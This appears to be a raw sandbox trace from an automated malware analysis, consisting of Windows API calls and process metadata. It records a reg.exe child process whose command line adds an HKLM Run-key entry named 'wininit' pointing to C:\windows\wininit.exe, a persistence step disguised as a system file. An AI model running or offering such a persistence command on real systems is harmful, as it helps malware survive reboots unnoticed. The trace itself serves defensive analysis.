_get_osfhandle (_FileHandle=1) returned 0x24 [0138.029] _errno () returned 0x5e0840 [0138.029] GetFileType (hFile=0x24) returned 0x2 [0138.029] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0138.029] GetFileType (hFile=0x24) returned 0x2 [0138.029] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0xcfcd0 | out: lpMode=0xcfcd0) returned 1 [0138.484] __iob_func () returned 0x7ff87fe6e210 [0138.484] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0138.484] lstrlenW (lpString="The operation completed successfully.\r\n") returned 39 [0138.484] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x490720*, nNumberOfCharsToWrite=0x27, lpNumberOfCharsWritten=0xcfd40, lpReserved=0x0 | out: lpBuffer=0x490720*, lpNumberOfCharsWritten=0xcfd40*=0x27) returned 1 [0138.622] GetProcessHeap () returned 0x490000 [0138.622] GetProcessHeap () returned 0x490000 [0138.622] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x499650) returned 1 [0138.622] GetProcessHeap () returned 0x490000 [0138.622] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x499650) returned 0x200 [0138.623] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x499650) returned 1 [0138.623] GetProcessHeap () returned 0x490000 [0138.623] GetProcessHeap () returned 0x490000 [0138.623] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x493f50) returned 1 [0138.623] GetProcessHeap () returned 0x490000 [0138.623] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x493f50) returned 0x18 [0138.623] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x493f50) returned 1 [0138.623] GetProcessHeap () returned 0x490000 [0138.623] GetProcessHeap () returned 0x490000 [0138.623] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x498680) returned 1 [0138.623] GetProcessHeap () returned 0x490000 [0138.623] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x498680) returned 0x20 [0138.624] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x498680) returned 1 [0138.624] GetProcessHeap () returned 0x490000 [0138.624] GetProcessHeap () returned 0x490000 [0138.624] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x493eb0) returned 1 [0138.624] GetProcessHeap () returned 0x490000 [0138.624] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x493eb0) returned 0x8e [0138.624] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x493eb0) returned 1 [0138.624] GetProcessHeap () returned 0x490000 [0138.624] GetProcessHeap () returned 0x490000 [0138.624] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x493e90) returned 1 [0138.624] GetProcessHeap () returned 0x490000 [0138.624] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x493e90) returned 0x18 [0138.624] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x493e90) returned 1 [0138.624] GetProcessHeap () returned 0x490000 [0138.624] GetProcessHeap () returned 0x490000 [0138.624] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x498770) returned 1 [0138.624] GetProcessHeap () returned 0x490000 [0138.624] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x498770) returned 0x20 [0138.625] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x498770) returned 1 [0138.625] GetProcessHeap () returned 0x490000 [0138.625] GetProcessHeap () returned 0x490000 [0138.625] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x498530) returned 1 [0138.625] GetProcessHeap () returned 0x490000 [0138.625] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x498530) returned 0x1e [0138.625] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x498530) returned 1 [0138.625] GetProcessHeap () returned 0x490000 [0138.625] GetProcessHeap () returned 0x490000 [0138.625] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x494310) returned 1 [0138.625] GetProcessHeap () returned 0x490000 [0138.625] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x494310) returned 0x18 [0138.625] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x494310) returned 1 [0138.625] GetProcessHeap () returned 0x490000 [0138.625] GetProcessHeap () returned 0x490000 [0138.625] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x498500) returned 1 [0138.625] GetProcessHeap () returned 0x490000 [0138.625] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x498500) returned 0x20 [0138.625] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x498500) returned 1 [0138.625] GetProcessHeap () returned 0x490000 [0138.625] GetProcessHeap () returned 0x490000 [0138.625] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x490720) returned 1 [0138.626] GetProcessHeap () returned 0x490000 [0138.626] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x490720) returned 0x50 [0138.626] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x490720) returned 1 [0138.626] GetProcessHeap () returned 0x490000 [0138.626] GetProcessHeap () returned 0x490000 [0138.626] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x494370) returned 1 [0138.626] GetProcessHeap () returned 0x490000 [0138.626] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x494370) returned 0x20 [0138.626] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x494370) returned 1 [0138.637] GetProcessHeap () returned 0x490000 [0138.637] GetProcessHeap () returned 0x490000 [0138.637] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x4938e0) returned 1 [0138.637] GetProcessHeap () returned 0x490000 [0138.637] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4938e0) returned 0x4a [0138.638] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x4938e0) returned 1 [0138.638] GetProcessHeap () returned 0x490000 [0138.638] GetProcessHeap () returned 0x490000 [0138.638] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x4943a0) returned 1 [0138.638] GetProcessHeap () returned 0x490000 [0138.638] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4943a0) returned 0x20 [0138.638] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x4943a0) returned 1 [0138.638] GetProcessHeap () returned 0x490000 [0138.638] GetProcessHeap () returned 0x490000 [0138.638] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x49a170) returned 1 [0138.638] GetProcessHeap () returned 0x490000 [0138.638] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x49a170) returned 0x8 [0138.638] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x49a170) returned 1 [0138.638] GetProcessHeap () returned 0x490000 [0138.638] GetProcessHeap () returned 0x490000 [0138.638] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x4943d0) returned 1 [0138.638] GetProcessHeap () returned 0x490000 [0138.638] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4943d0) returned 0x20 [0138.639] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x4943d0) returned 1 [0138.640] GetProcessHeap () returned 0x490000 [0138.640] GetProcessHeap () returned 0x490000 [0138.640] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x494400) returned 1 [0138.640] GetProcessHeap () returned 0x490000 [0138.640] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x494400) returned 0x20 [0138.640] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x494400) returned 1 [0138.640] GetProcessHeap () returned 0x490000 [0138.640] GetProcessHeap () returned 0x490000 [0138.640] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x4947e0) returned 1 [0138.640] GetProcessHeap () returned 0x490000 [0138.640] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4947e0) returned 0x18 [0138.641] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x4947e0) returned 1 [0138.641] GetProcessHeap () returned 0x490000 [0138.641] GetProcessHeap () returned 0x490000 [0138.641] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x498560) returned 1 [0138.641] GetProcessHeap () returned 0x490000 [0138.641] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x498560) returned 0x20 [0138.641] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x498560) returned 1 [0138.641] GetProcessHeap () returned 0x490000 [0138.641] GetProcessHeap () returned 0x490000 [0138.641] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x4985f0) returned 1 [0138.641] GetProcessHeap () returned 0x490000 [0138.641] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4985f0) returned 0x20 [0138.641] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x4985f0) returned 1 [0138.641] GetProcessHeap () returned 0x490000 [0138.641] GetProcessHeap () returned 0x490000 [0138.641] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x4984d0) returned 1 [0138.641] GetProcessHeap () returned 0x490000 [0138.641] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4984d0) returned 0x20 [0138.642] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x4984d0) returned 1 [0138.642] GetProcessHeap () returned 0x490000 [0138.642] GetProcessHeap () returned 0x490000 [0138.642] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x498740) returned 1 [0138.642] GetProcessHeap () returned 0x490000 [0138.642] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x498740) returned 0x20 [0138.642] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x498740) returned 1 [0138.642] GetProcessHeap () returned 0x490000 [0138.642] GetProcessHeap () returned 0x490000 [0138.642] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x494280) returned 1 [0138.642] GetProcessHeap () returned 0x490000 [0138.642] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x494280) returned 0x18 [0138.642] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x494280) returned 1 [0138.642] GetProcessHeap () returned 0x490000 [0138.642] GetProcessHeap () returned 0x490000 [0138.642] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x4987d0) returned 1 [0138.642] GetProcessHeap () returned 0x490000 [0138.642] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4987d0) returned 0x20 [0138.643] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x4987d0) returned 1 [0138.643] GetProcessHeap () returned 0x490000 [0138.643] GetProcessHeap () returned 0x490000 [0138.643] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x4987a0) returned 1 [0138.643] GetProcessHeap () returned 0x490000 [0138.643] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4987a0) returned 0x20 [0138.643] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x4987a0) returned 1 [0138.643] GetProcessHeap () returned 0x490000 [0138.643] GetProcessHeap () returned 0x490000 [0138.643] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x498620) returned 1 [0138.643] GetProcessHeap () returned 0x490000 [0138.643] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x498620) returned 0x20 [0138.643] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x498620) returned 1 [0138.643] GetProcessHeap () returned 0x490000 [0138.643] GetProcessHeap () returned 0x490000 [0138.643] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x4942a0) returned 1 [0138.643] GetProcessHeap () returned 0x490000 [0138.643] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4942a0) returned 0x18 [0138.643] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x4942a0) returned 1 [0138.643] GetProcessHeap () returned 0x490000 [0138.643] GetProcessHeap () returned 0x490000 [0138.643] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x498470) returned 1 [0138.644] GetProcessHeap () returned 0x490000 [0138.644] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x498470) returned 0x20 [0138.644] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x498470) returned 1 [0138.644] GetProcessHeap () returned 0x490000 [0138.644] GetProcessHeap () returned 0x490000 [0138.644] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x4947a0) returned 1 [0138.644] GetProcessHeap () returned 0x490000 [0138.644] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4947a0) returned 0x18 [0138.644] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x4947a0) returned 1 [0138.644] exit (_Code=0) Thread: id = 53 os_tid = 0x10c0 Process: id = "11" image_name = "reg.exe" filename = "c:\\windows\\system32\\reg.exe" page_root = "0x49326000" os_pid = "0x10f8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xe44" cmd_line = "\"C:\\Windows\\System32\\reg.exe\" ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"wininit\" /t REG_SZ /F /D \"C:\\windows\\wininit.exe\"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 786 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 787 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 788 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 789 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 790 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 791 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 792 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 793 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 794 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 795 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 796 start_va = 0x7ff69b220000 end_va = 0x7ff69b275fff monitored = 1 entry_point = 0x7ff69b22e200 region_type = mapped_file name = "reg.exe" filename = "\\Windows\\System32\\reg.exe" (normalized: "c:\\windows\\system32\\reg.exe") Region: id = 797 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 816 start_va = 0x410000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 817 start_va = 0x7ff87ce40000 end_va = 0x7ff87d027fff monitored = 0 entry_point = 0x7ff87ce6ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 818 start_va = 0x7ff87f640000 end_va = 0x7ff87f6ecfff monitored = 0 entry_point = 0x7ff87f6581a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 819 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 820 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 821 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1266 start_va = 0x7ff87fde0000 end_va = 0x7ff87fe7cfff monitored = 0 entry_point = 0x7ff87fde78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1267 start_va = 0x510000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 1268 start_va = 0x7ff87fd30000 end_va = 0x7ff87fdd6fff monitored = 0 entry_point = 0x7ff87fd458d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1269 start_va = 0x7ff87f970000 end_va = 0x7ff87f9cafff monitored = 0 entry_point = 0x7ff87f9838b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1270 start_va = 0x7ff87fe80000 end_va = 0x7ff87ff9bfff monitored = 0 entry_point = 0x7ff87fec02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1271 start_va = 0x7ff87eed0000 end_va = 0x7ff87ef3afff monitored = 0 entry_point = 0x7ff87eee90c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1272 start_va = 0x590000 end_va = 0x76ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 1273 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1274 start_va = 0x770000 end_va = 0xaa6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1288 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1293 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 1294 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 1295 start_va = 0x590000 end_va = 0x66ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 1296 start_va = 0x760000 end_va = 0x76ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Thread: id = 31 os_tid = 0xc60 [0137.398] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff69b220000 [0137.398] __set_app_type (_Type=0x1) [0137.398] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff69b22e510) returned 0x0 [0137.398] __wgetmainargs (in: _Argc=0x7ff69b232048, _Argv=0x7ff69b232050, _Env=0x7ff69b232058, _DoWildCard=0, _StartInfo=0x7ff69b232064 | out: _Argc=0x7ff69b232048, _Argv=0x7ff69b232050, _Env=0x7ff69b232058) returned 0 [0137.398] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="ADD", cchCount1=-1, lpString2="QUERY", cchCount2=-1) returned 1 [0137.528] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="ADD", cchCount1=-1, lpString2="ADD", cchCount2=-1) returned 2 [0137.529] RegOpenKeyW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", phkResult=0xcfeb8 | out: phkResult=0xcfeb8*=0x0) returned 0x2 [0137.873] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="ADD", cchCount1=-1, lpString2="ADD", cchCount2=-1) returned 2 [0137.873] lstrlenW (lpString="-?|/?|-h|/h") returned 11 [0137.873] GetProcessHeap () returned 0x410000 [0137.873] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x18) returned 0x414790 [0137.873] lstrlenW (lpString="") returned 0 [0137.873] GetProcessHeap () returned 0x410000 [0137.873] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x2) returned 0x4147b0 [0137.873] GetProcessHeap () returned 0x410000 [0137.873] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x414270 [0137.874] GetProcessHeap () returned 0x410000 [0137.874] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x18) returned 0x4147d0 [0137.874] GetProcessHeap () returned 0x410000 [0137.874] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x4142a0 [0137.874] GetProcessHeap () returned 0x410000 [0137.874] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x4142d0 [0137.876] GetProcessHeap () returned 0x410000 [0137.876] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x418920 [0137.876] GetProcessHeap () returned 0x410000 [0137.876] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x418800 [0137.876] GetProcessHeap () returned 0x410000 [0137.876] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x18) returned 0x414300 [0137.876] GetProcessHeap () returned 0x410000 [0137.876] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x4189e0 [0137.876] GetProcessHeap () returned 0x410000 [0137.876] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x418830 [0137.876] GetProcessHeap () returned 0x410000 [0137.876] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x418980 [0137.876] GetProcessHeap () returned 0x410000 [0137.876] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x418a10 [0137.876] GetProcessHeap () returned 0x410000 [0137.877] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x18) returned 0x412050 [0137.877] GetProcessHeap () returned 0x410000 [0137.877] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x418a40 [0137.877] GetProcessHeap () returned 0x410000 [0137.877] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x418a70 [0137.877] GetProcessHeap () returned 0x410000 [0137.877] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x418aa0 [0137.877] GetProcessHeap () returned 0x410000 [0137.877] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x418ad0 [0137.877] SetThreadUILanguage (LangId=0x0) returned 0x409 [0138.056] GetProcessHeap () returned 0x410000 [0138.056] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x18) returned 0x414080 [0138.056] _memicmp (_Buf1=0x414080, _Buf2=0x7ff69b2300d8, _Size=0x7) returned 0 [0138.056] GetProcessHeap () returned 0x410000 [0138.056] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x1e) returned 0x418b30 [0138.056] lstrlenW (lpString="HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 50 [0138.056] GetProcessHeap () returned 0x410000 [0138.056] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x18) returned 0x413e80 [0138.056] _memicmp (_Buf1=0x413e80, _Buf2=0x7ff69b2300d8, _Size=0x7) returned 0 [0138.056] GetProcessHeap () returned 0x410000 [0138.056] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x6c) returned 0x413ea0 [0138.056] _vsnwprintf (in: _Buffer=0x418b30, _BufferCount=0xe, _Format="|%s|", _ArgList=0xcfcf8 | out: _Buffer="|-?|/?|-h|/h|") returned 13 [0138.056] _vsnwprintf (in: _Buffer=0x413ea0, _BufferCount=0x35, _Format="|%s|", _ArgList=0xcfcf8 | out: _Buffer="|HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run|") returned 52 [0138.056] lstrlenW (lpString="|-?|/?|-h|/h|") returned 13 [0138.056] lstrlenW (lpString="|HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run|") returned 52 [0138.057] RtlRestoreLastWin32Error () returned 0x238000 [0138.057] lstrlenW (lpString="HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 50 [0138.057] GetProcessHeap () returned 0x410000 [0138.057] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x66) returned 0x413860 [0138.057] lstrlenW (lpString="HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 50 [0138.057] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0138.058] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0138.058] StrChrW (lpStart=" \x09", wMatch=0x4b) returned 0x0 [0138.058] StrChrW (lpStart=" \x09", wMatch=0x4c) returned 0x0 [0138.058] StrChrW (lpStart=" \x09", wMatch=0x4d) returned 0x0 [0138.058] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0138.058] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0138.058] StrChrW (lpStart=" \x09", wMatch=0x4f) returned 0x0 [0138.058] StrChrW (lpStart=" \x09", wMatch=0x46) returned 0x0 [0138.058] StrChrW (lpStart=" \x09", wMatch=0x54) returned 0x0 [0138.058] StrChrW (lpStart=" \x09", wMatch=0x57) returned 0x0 [0138.058] StrChrW (lpStart=" \x09", wMatch=0x41) returned 0x0 [0138.058] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0138.058] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0138.058] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0138.058] StrChrW (lpStart=" \x09", wMatch=0x4d) returned 0x0 [0138.058] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0138.058] StrChrW (lpStart=" \x09", wMatch=0x63) returned 0x0 [0138.058] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0138.058] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0138.058] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0138.058] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0138.058] StrChrW (lpStart=" \x09", wMatch=0x66) returned 0x0 [0138.058] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0138.058] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0138.058] StrChrW (lpStart=" \x09", wMatch=0x57) returned 0x0 [0138.058] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0138.058] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0138.058] StrChrW (lpStart=" \x09", wMatch=0x64) returned 0x0 [0138.058] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0138.058] StrChrW (lpStart=" \x09", wMatch=0x77) returned 0x0 [0138.058] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0138.058] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0138.058] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 